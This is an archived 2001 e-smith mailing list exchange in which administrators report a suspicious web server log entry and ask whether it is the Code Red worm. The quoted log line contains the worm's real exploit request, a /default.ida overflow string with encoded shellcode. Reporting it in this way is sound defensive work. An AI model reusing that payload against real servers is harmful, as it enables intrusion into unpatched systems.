Blake Heinemann wrote:
> I noticed today on 3 different esmith boxes that I've been getting:
>
> www.<domain> xxx.xxx.xxx.xxx - - [19/Jul/2001:18:19:55 -0500] "GET
>
>/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 400 252 "-" "-"
>
> from several different IP addresses multiple times. Is this the code red worm?
> Three different esmith boxes on, 2 on dsl, 1 on cable were all hit about the same
> time from different IP addresses.
>
> Any ideas?
Same here Dan multiple instances. Multiple servers.
--
Synaptic solutions. www.synapticserver.com
Microsoft/linux specialists.
Advanced commmunications for small business
T.61 3 9482 5273 9 Lees st Northcote
--
Please report bugs to [EMAIL PROTECTED]
Please mail [EMAIL PROTECTED] (only) to discuss security issues
Support for registered customers and partners to [EMAIL PROTECTED]
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
Archives by mail and http://www.mail-archive.com/devinfo%40lists.e-smith.org
